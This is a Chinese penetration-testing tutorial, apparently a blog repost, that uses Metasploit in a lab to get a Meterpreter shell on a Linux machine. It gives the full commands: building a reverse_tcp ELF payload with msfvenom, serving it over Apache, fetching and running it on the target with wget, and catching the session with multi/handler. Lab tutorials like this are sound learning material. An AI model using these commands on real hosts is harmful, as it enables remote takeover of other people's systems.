客户端渗透之——使用Metasploit实现对Linux客户端的渗透

其他 2019-01-25 03:08:34 阅读次数: 0
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/l1028386804/article/details/86633254

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633254

攻击机 Kali 192.168.175.128

靶机 CentOS 6.5 192.168.175.132

1.生成elf文件

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.175.128 LPORT=5555 -f elf > /var/www/html/pay.elf

这里,我们将生成的pay.elf文件保存到了/var/www/html/目录下。

2.启动apache服务器

service apache2 start

3.在靶机上下载pay.elf

这里,假设我们经过一系列的渗透取得了靶机的权限,在靶机上执行如下命令

wget http://192.168.175.128/pay.elf
chmod a+x pay.elf
./pay.elf

4.在攻击机上执行攻击操作

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
setg LHOST 192.168.175.128
setg LPORT 5555
exploit

这样,我们就可以获取目标服务器的Meterpreter了。

猜你喜欢

转载自blog.csdn.net/l1028386804/article/details/86633254
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型
JS实现无缝滚动上
深入解析HashMap原理(基于JDK1.8)
mysql的连接池
关于.htc
linux下的ubuntu12.04图形界面
【数论】好推不好记的扩展欧几里德
设备树详解
cscope + tags 简单设置
xml学习
每日归档
更多
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022